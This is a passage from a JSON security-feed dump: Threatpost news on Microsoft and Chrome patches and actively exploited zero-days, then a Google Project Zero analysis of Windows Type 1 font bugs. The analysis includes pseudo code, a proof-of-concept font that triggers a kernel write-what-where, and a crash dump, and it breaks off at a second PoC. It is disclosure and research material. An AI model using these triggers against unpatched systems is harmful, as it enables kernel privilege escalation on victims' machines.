[patched 99 bugs](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>); and in January, it [tackled 50 flaws](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>).\n\nAlso for this week, Oracle [patched a whopping 405 security vulnerabilities](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>) \u2013 while on the other end of the spectrum, Adobe went light, with [only five CVEs](<https://threatpost.com/adobe-fixes-important-flaws-in-coldfusion-after-effects-and-digital-editions/154780/>) addressed for April.\n\n**Bugs Under Active Exploit**\n\nOn the zero-day front, Microsoft patched [CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>), a critical-level memory-corruption vulnerability in Internet Explorer that was exploited in the wild. The bug allows RCE, and exists due to the improper handling of objects in memory by the scripting engine.\n\n\u201cThere are multiple scenarios in which this vulnerability could be exploited,\u201d Satnam Narang, principal research engineer at Tenable, told Threatpost. \u201cThe primary way would be to socially engineer a user into visiting a website containing the malicious code, whether owned by the attacker, or a compromised website with the malicious code injected into it. An attacker could also socially engineer the user into opening a malicious Microsoft Office document that embeds the malicious code.\u201d\n\nChris Hass, director of information security and research for Automox, told Threatpost that CVE-2020-0968 is a perfect vulnerability for use for drive-by compromise.\n\n\u201cIf the current user is logged in as admin, an attacker could host a specially crafted website, hosting this vulnerability, once the unpatched user navigates the malicious site, the attacker could then exploit this bug, allowing the attacker to gain remote access the host,\u201d he explained. \u201cThis bug would allow the attacker to view, change, delete data or even install ransomware.\u201d\n\nAlthough the scope of this vulnerability is somewhat limited because IE has seen a steady decline in user-base, it still remains an attractive vector for cybercriminals, Hass added.\n\nMeanwhile, two of the actively exploited bugs are important-rated RCE issues related to the Windows Adobe Type Manager Library.\n\nThe first, [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), was already made public. It arises because the library improperly handles a specially-crafted multi-master font, the Adobe Type 1 PostScript format.\n\n\u201cAttackers can use this vulnerability to execute their code on affected systems if they can convince a user to view a specially crafted font,\u201d according to Dustin Childs, with ZDI, in a [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/4/14/the-april-2020-security-update-review>). \u201cThe code would run at the level of the logged-on user.\u201d\n\nThe related bug is the zero-day [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), an RCE vulnerability that impacts an OpenType font renderer within Windows. Again, an attacker could execute code on a target system if a user viewed a specially crafted font.\n\nThough the two are related, \u201cthere is currently no confirmation that the two are related to the same set of in-the-wild attacks,\u201d Narang told Threatpost. As for attack vector, \u201cto exploit these flaws, an attacker would need to socially engineer a user into opening a malicious document or viewing the document in the Windows Preview pane,\u201d he added.\n\nBoth of these bugs have been used for Windows 7 systems \u2013 and Childs noted that not all Windows 7 systems will receive a patch since the OS left support in January of this year.\n\nThe final actively exploited bug \u2013 also not previously publicly disclosed \u2013 is [CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>), which exists in the way that the Windows Kernel handles objects in memory. \u201cAn attacker who successfully exploited the vulnerability could execute code with elevated permissions,\u201d according to Microsoft, which labeled the flaw \u201cimportant.\u201d\n\nTo exploit the vulnerability, a locally authenticated attacker would need to run a specially crafted application.\n\n**Other Priority Patches**\n\nMicrosoft also patched several notable other bugs that researchers said admins should prioritize in the large update.\n\n[CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>) is the second previously disclosed issue, an important-rated privilege-elevation vulnerability found in OneDrive for Windows. It exists due to improper handling of symbolic links (shortcut links), and exploitation would allow an attacker to further compromise systems, execute additional payloads that may need higher privileges to be effective, or gain access to personal or confidential information that was not available previously.\n\n\u201cAn attacker that has gained access to an endpoint could use OneDrive to overwrite a targeted file, leading to an elevated status,\u201d Hass told Threatpost. \u201cOneDrive is extremely popular and often installed by default on Windows 10. When you combine this with remote work, and the ever-growing use of personal devices for remote work, it makes the potential scope for this vulnerability pretty high.\u201d\n\nZDI\u2019s Childs also flagged an important-rated Windows DNS denial-of-service (DoS) bug, [CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>), which affects client systems.\n\n\u201cAn attacker could cause the DNS service to be nonresponsive by sending some specially crafted DNS queries to an affected system,\u201d Childs wrote. \u201cConsidering the damage that could be done by an unauthenticated attacker, this should be high on your test and deploy list.\u201d\n\nAnother, [CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>), is an important-rated Windows token security feature bypass vulnerability that comes from Windows improperly handling token relationships in Windows 10 version 1903 and higher.\n\n\u201cIt\u2019s not often you see a security feature bypass directly result in a sandbox escape, but that\u2019s exactly what this bug allows,\u201d Childs explained. \u201cAttackers could abuse this to allow an application with a certain integrity level to execute code at a different \u2013 presumably higher \u2013 integrity level.\u201d\n\n**Critical SharePoint Bugs**\n\nSharePoint, a web-based collaborative platform that integrates with Microsoft Office, is often used as a document management and storage system. The platform saw its share of critical problems this month, including four critical RCE bugs, which arise from the fact that the software does not check the source markup of an application package, according to [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>).\n\nThe bug tracked as [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>) paves the way for RCE and affects Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 Service Pack 2, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019.\n\nA second critical bug ([CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>)) also would allow RCE; it affects Microsoft Business Productivity Servers 2010 Service Pack 2, Microsoft SharePoint Enterprise Server 2013 Service Pack 1, Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1, and Microsoft SharePoint Server 2019.\n\nYet another RCE problem ([CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>)) impacts Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019; and [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>) affects Microsoft SharePoint Enterprise Server 2016 and Microsoft SharePoint Server 2019.\n\nFor all of the RCE bugs, \u201can attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account,\u201d Microsoft said in the individual bug advisories. An attacker could exploit any of them by uploading a specially crafted SharePoint application package to an affected version of SharePoint.\n\nSharePoint also harbors a fifth critical bug, [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>). This is an XSS flaw that affects Microsoft SharePoint Server 2019 and Enterprise Server 2016 and would allow spoofing.\n\n**Not One to Skip Amidst WFH**\n\nEven though IT and security organizations are already strained with the added stress of the sudden shift to remote working in the face of the coronavirus pandemic, April\u2019s Patch Tuesday is not one to skip, Richard Melick, senior technical product manager at Automox, told Threatpost \u2014 least of all given the four actively exploited bugs.\n\n\u201cFrom increasingly diverse technological environments to a list of unknown connectivity factors, IT and SecOps managers need to create a deployment plan that addresses today\u2019s zero-day, exploited and critical vulnerabilities within 24 hours and the rest within 72 hours in order to stay ahead of weaponization,\u201d he advised. \u201cHackers are not taking time off; they are working just as hard as everyone else.\u201d\n\nMelick also said that the consequences of exploitation could be exacerbated given the [work-from-home (WFH) lapses in security](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) that may be present.\n\n\u201cWith today\u2019s remote workforce environment and the necessity of sharing documents through email or file share, all it takes is one phishing email, malicious website or exploited document to open the door for an attacker,\u201d he said. \u201cOnce in, a malicious party would have the ability to modify data, install backdoors or new software, or gain full user rights accounts. While older versions of Windows are more susceptible to both exploits, the adoption rate of Windows 10 is only a little above 50 percent, leaving more than enough targets for attackers.\u201d\n\nTeams should be ready for plenty of overhead in terms of the patching work involved, added Jonathan Cran, head of research at Kenna Security.\n\n\u201cGiven the shift to remote work for many organizations in combination with the current patch load from Oracle\u2019s update earlier this week and what looks like a backlog of patching, this looks like a busy month for many security teams,\u201d Cran told Threatpost. \u201cWe have yet to see how work from home impacts patching rates, but for security teams, installing numerous patches on remote employee laptops, likely via a corporate VPN to the Windows Server Update Services or Microsoft System Center Configuration Manager, will be a resource- and time-intensive endeavor.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-14T19:45:49", "type": "threatpost", "title": "April Patch Tuesday: Microsoft Battles 4 Bugs Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0974", "CVE-2020-0981", "CVE-2020-0993", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-14T19:45:49", "id": "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "href": "https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:29:07", "description": "Google said Monday it has patched a Chrome web browser zero-day bug being actively exploited in the wild. The flaw affects versions of Chrome running on the Windows, macOS and Linux platforms.\n\nThe zero-day vulnerability, tracked as CVE-2020-6418, is a type of confusion bug and has a severity rating of high. Google said the flaw impacts versions of Chrome released before version 80.0.3987.122. The bug is tied to Chrome\u2019s open-source JavaScript and Web Assembly engine, called V8.\n\nTechnical details of CVE-2020-6418 are being withheld pending patch deployment to a majority of affected versions of the Chrome browser, [according to Google](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>). Generally speaking, memory corruption vulnerabilities occur when memory is altered without explicit data assignments triggering programming errors, which enable an adversary to execute arbitrary code on targeted devices.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn the context web browser engines, a similar memory corruption bug exploited by adversaries [earlier this month](<https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/>), enticed victims to visit a specially-crafted web site booby-trapped with and an exploit that took advantage of a browser memory corruption flaw to execute code remotely.\n\nCredited for finding the bug is Google\u2019s Threat Analysis Group and researcher Cl\u00e9ment Lecigne.\n\nGoogle is also warning users of two additional high-severity vulnerabilities. One, tracked as CVE-2020-6407, is an \u201cout of bounds memory access in streams\u201d bug. The other bug, which does not have a CVE assignment, is a flaw tied to an integer overflow in ICU, a flaw commonly associated with triggering a denial of service and possibly to code execution.\n\nMitigation includes Windows, Linux, and macOS users download and install [the latest version of Chrome](<https://support.google.com/chrome/answer/95414?co=GENIE.Platform%3DDesktop&hl=en>).\n", "cvss3": {}, "published": "2020-02-25T18:34:52", "type": "threatpost", "title": "Google Patches Chrome Browser Zero-Day Bug, Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T18:34:52", "id": "THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "href": "https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-21T12:26:16", "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>) which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac & Linux\u2013among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! (restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-10-21T12:23:29", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "modified": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. Tracked as CVE-2020-16009, this bug is the most troubling, rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 is Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to effected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). Lastly there Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as (CVE-2020-16011).\n\nThis week\u2019s Chrome updates come on the heels of zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google effecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in that just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T17:23:23", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "modified": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2021-07-30T19:23:23", "description": "This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Mateusz Jurczyk and Sergei Glazunov, Project Zero\n\nIn this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.\n\n## 1\\. Font vulnerabilities on Windows \u2264 8.1 (CVE-2020-0938, CVE-2020-1020)\n\n### Background\n\nThe Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called \"Multiple Master Fonts\", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the [blend operator](<https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html>)).\n\nOn Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. \"CVE-2020-1027\"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome [uses](<https://bugs.chromium.org/p/chromium/issues/detail?id=365160>), so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).\n\nNevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.\n\n### Font bug #1\n\nThe first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The \"VToHOrigin\" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:\n\nint ParseBlendVToHOrigin(void *arg) {\n\nFixed16_16 *ptrs[2];\n\nFixed16_16 values[2];\n\nfor (int i = 0; i < g_font->numMasters; i++) {\n\nptrs[i] = &g_font->SomeArray[arg->SomeField + i];\n\n}\n\nfor (int i = 0; i < 2; i++) {\n\nint values_read = GetOpenFixedArray(values, g_font->numMasters);\n\nif (values_read != g_font->numMasters) {\n\nreturn -8;\n\n}\n\nfor (int num = 0; num < g_font->numMasters; num++) {\n\nptrs[num][i] = values[num];\n\n}\n\n}\n\nreturn 0;\n\n} \n \n--- \n \nIn summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0\u201316, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:\n\n... \n \n--- \n \nRSP + 0x30\n\n| \n\nptrs[0] \n \nRSP + 0x38\n\n| \n\nptrs[1] \n \nRSP + 0x40\n\n| \n\nsaved RDI \n \nRSP + 0x48\n\n| \n\nreturn address \n \nRSP + 0x50\n\n| \n\nvalues[0 .. 1] \n \nRSP + 0x58\n\n| \n\nsaved RBX \n \nRSP + 0x60\n\n| \n\nsaved RSI \n \n... \n \nThe green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.\n\nAfter the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.\n\nA proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 \\+ type1 utilities as part of [AFDKO](<https://github.com/adobe-type-tools/afdko/>)) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:\n\n~%!PS-AdobeFont-1.0: Test 001.001\n\ndict begin\n\n/FontInfo begin\n\n/FullName (Test) def\n\nend\n\n/FontType 1 def\n\n/FontMatrix [0.001 0 0 0.001 0 0] def\n\n/WeightVector [0 0 0 0 0] def\n\n/Private begin\n\n/Blend begin\n\n/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]\n\n/end\n\nend\n\ncurrentdict end\n\n%currentfile eexec /Private begin\n\n/CharStrings 1 begin\n\n/.notdef ## -| { endchar } |-\n\nend\n\nend\n\nmark %currentfile closefile\n\ncleartomark \n \n--- \n \nThe first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\nArguments:\n\nArg1: ffffffff41414141, memory referenced.\n\nArg2: 0000000000000001, value 0 = read operation, 1 = write operation.\n\nArg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory\n\naddress.\n\nArg4: 0000000000000002, (reserved)\n\n[...]\n\nTRAP_FRAME: ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)\n\nNOTE: The trap frame does not contain all registers.\n\nSome register values may be zeroed or incorrect.\n\nrax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141\n\nrdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000\n\nrip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000\n\nr8=0000000000000000 r9=000000000000000e r10=0000000000000000\n\nr11=00000000fffffffb r12=0000000000000000 r13=0000000000000000\n\nr14=0000000000000000 r15=0000000000000000\n\niopl=0 nv up ei pl nz na po cy\n\nATMFD+0x22144:\n\nfffff96000a86144 890499 mov dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????\n\nResetting default scope \n \n--- \n \n### Font bug #2\n\nThe second issue was found in the processing of the /BlendDesignPositions object, which is defined in the [Adobe Font Metrics File Format Specification](<https://www.adobe.com/content/dam/acom/en/devnet/font/pdfs/5004.AFM_Spec.pdf>) document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:\n\nint SetBlendDesignPositions(void *arg) {\n\nint num_master;\n\nFixed16_16 values[16][15];\n\nfor (num_master = 0; ; num_master++) {\n\nif (GetToken() != TOKEN_OPEN) {\n\nbreak;\n\n}\n\nint values_read = GetOpenFixedArray(&values[num_master], 15);\n\nSetNumAxes(values_read);\n\n}\n\nSetNumMasters(num_master);\n\nfor (int i = 0; i < num_master; i++) {\n\nprocs->BlendDesignPositions(i, &values[i]);\n\n}\n\nreturn 0;\n\n} \n \n--- \n \nThe bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.\n\nTo trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:\n\n~%!PS-AdobeFont-1.0: Test 001.001\n\ndict begin\n\n/FontInfo 